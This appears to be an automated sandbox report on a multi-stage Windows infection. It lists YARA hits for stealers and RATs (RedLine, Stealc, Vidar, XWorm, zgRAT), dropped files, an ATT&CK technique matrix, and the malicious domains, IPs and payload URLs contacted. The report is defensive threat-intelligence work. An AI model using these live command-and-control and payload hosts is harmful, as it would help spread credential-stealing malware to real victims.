Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.gold.exe.37a5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.hjhTHr6fWy.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.gold.exe.37a5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.crypted.exe.39e5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.newbundle2.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2858375876.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.2951592112.0000000000C41000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3088502787.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2743413238.0000000000982000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gold.exe PID: 2972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hjhTHr6fWy.exe PID: 1856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: penis.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 2956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000017.00000002.3340691563.000000000279D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fidovideorecorder32_64.exe PID: 3288, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 19.0.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.30ea4b9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.30ea4b9.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2996521135.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2972396756.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, type: DROPPED
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001BEAA8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	16_2_001BEAA8
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Code function: 16_2_001BDDB1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	16_2_001BDDB1
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0023EAA8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	17_2_0023EAA8
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Code function: 17_2_0023DDB1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	17_2_0023DDB1

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Windows Service	1 Windows Service	111 Deobfuscate/Decode Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	512 Process Injection	5 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Install Root Certificate	NTDS	359 System Information Discovery	Distributed Component Object Model	11 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	11 Registry Run Keys / Startup Folder	33 Software Packing	LSA Secrets	10101 Security Software Discovery	SSH	2 Clipboard Data	124 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	1 PowerShell	RC Scripts	RC Scripts	1 Timestomp	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	481 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	481 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	3 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	512 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	57%	Virustotal		Browse
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Fido Video Recorder\fidovideorecorder32_64.exe	100%	Joe Sandbox ML
C:\ProgramData\EBook JS Plugin 9.26.47\EBook JS Plugin 9.26.47.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\Qt5OpenGL.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\is-0DA5B.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\is-65AJA.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\is-8M782.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\is-AMTS2.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\is-NSLMU.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\is-S5HN7.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\libeay32.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\libssl-1_1.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\msvcp71.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\msvcr71.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Fido Video Recorder\ssleay32.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe	96%	ReversingLabs	Win32.Trojan.Multiverze
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe	33%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\12dsvc[1].exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\LummaC222222[1].exe	66%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\stories[1].exe	11%	ReversingLabs	Win32.Trojan.Munp
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\crypted[1].exe	96%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\neon[1].exe	14%	ReversingLabs	Win64.Trojan.SpywareX
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\rstxdhuj[1].exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.SnakeKeylogger
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe	76%	ReversingLabs	Win32.Trojan.Stealerc
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cccc2[1].exe	79%	ReversingLabs	Win32.Trojan.Jalapeno
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\gold[1].exe	100%	ReversingLabs	ByteCode-MSIL.Trojan.Seraph

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
fragnantbui.shop	0%	Virustotal	Browse
gutterydhowi.shop	0%	Virustotal	Browse
google.com	0%	Virustotal	Browse
offensivedzvju.shop	0%	Virustotal	Browse
youtube.com	0%	Virustotal	Browse
drawzhotdog.shop	0%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
youtube-ui.l.google.com	0%	Virustotal	Browse
stogeneratmns.shop	0%	Virustotal	Browse
www.youtube.com	0%	Virustotal	Browse
reinforcenh.shop	0%	Virustotal	Browse
ballotnwu.site	8%	Virustotal	Browse
www.google.com	0%	Virustotal	Browse
vozmeatillu.shop	0%	Virustotal	Browse
ghostreedmnu.shop	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.innosetup.com/	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	Avira URL Cloud	safe
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	0%	Avira URL Cloud	safe
lootebarrkeyn.shop	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
lootebarrkeyn.shop	16%	Virustotal		Browse
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	0%	Virustotal		Browse
http://185.215.113.26/Dem7kTu/index.phpWindows	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	0%	Virustotal		Browse
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	1%	Virustotal		Browse
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
http://www.x-ways.net/winhex/subscribe-d.htmlU	0%	Avira URL Cloud	safe
stogeneratmns.shop	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	0%	Virustotal		Browse
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	0%	Virustotal		Browse
http://www.x-ways.net/winhex/subscribe-d.htmlU	1%	Virustotal		Browse
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Virustotal		Browse
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
stogeneratmns.shop	0%	Virustotal		Browse
http://185.215.113.26/Dem7kTu/index.phpjavapath;C:	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	Avira URL Cloud	safe
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	0%	Virustotal		Browse
http://91.202.233.158/	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	Avira URL Cloud	safe
http://185.215.113.26/rage.Streams.DataWriter	0%	Avira URL Cloud	safe
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id6ResponseD	1%	Virustotal		Browse
http://185.215.113.117/inc/needmoney.exeu5n	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.php	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Avira URL Cloud	safe
http://91.202.233.158/	20%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	0%	Virustotal		Browse
https://reinforcenh.shop/api	16%	Virustotal		Browse
http://www.x-ways.net/order.html-d.htmlS	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13ResponseD	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Avira URL Cloud	safe
http://www.x-ways.net/order.html-d.htmlS	1%	Virustotal		Browse
http://91.202.233.158/e96ea2db21fa9a1b.php	22%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13ResponseD	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	0%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	2%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	Avira URL Cloud	safe
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	0%	Virustotal		Browse
http://185.215.113.16/inc/rstxdhuj.exez&	100%	Avira URL Cloud	phishing
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Virustotal		Browse
http://crl.ver)	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	0%	Virustotal		Browse
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	1%	Virustotal		Browse
http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHD	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	0%	Avira URL Cloud	safe
fragnantbui.shop	100%	Avira URL Cloud	malware
http://185.215.113.17/2fb6c2cc8dce150a.php3	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id21ResponseD	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	0%	Virustotal		Browse
http://185.215.113.17/2fb6c2cc8dce150a.php4	100%	Avira URL Cloud	malware
http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJa	100%	Avira URL Cloud	malware
offensivedzvju.shop	100%	Avira URL Cloud	malware
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fragnantbui.shop	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
gutterydhowi.shop	104.21.4.136	true	true	0%, Virustotal, Browse	unknown
google.com	142.250.186.174	true	false	0%, Virustotal, Browse	unknown
offensivedzvju.shop	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
drawzhotdog.shop	172.67.162.108	true	true	0%, Virustotal, Browse	unknown
ghostreedmnu.shop	188.114.97.3	true	true	0%, Virustotal, Browse	unknown
ballotnwu.site	104.21.2.13	true	true	8%, Virustotal, Browse	unknown
youtube.com	142.250.181.238	true	false	0%, Virustotal, Browse	unknown
youtube-ui.l.google.com	216.58.212.174	true	false	0%, Virustotal, Browse	unknown
steamcommunity.com	104.102.49.254	true	false	0%, Virustotal, Browse	unknown
stogeneratmns.shop	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
reinforcenh.shop	172.67.208.139	true	true	0%, Virustotal, Browse	unknown
www.google.com	216.58.206.68	true	false	0%, Virustotal, Browse	unknown
vozmeatillu.shop	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
www.youtube.com	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
lootebarrkeyn.shop	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
stogeneratmns.shop	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/	true	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php	true	22%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
188.190.10.161	true	Avira URL Cloud: safe	unknown
http://185.215.113.17/f1ddeb6592c03206/sqlite3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
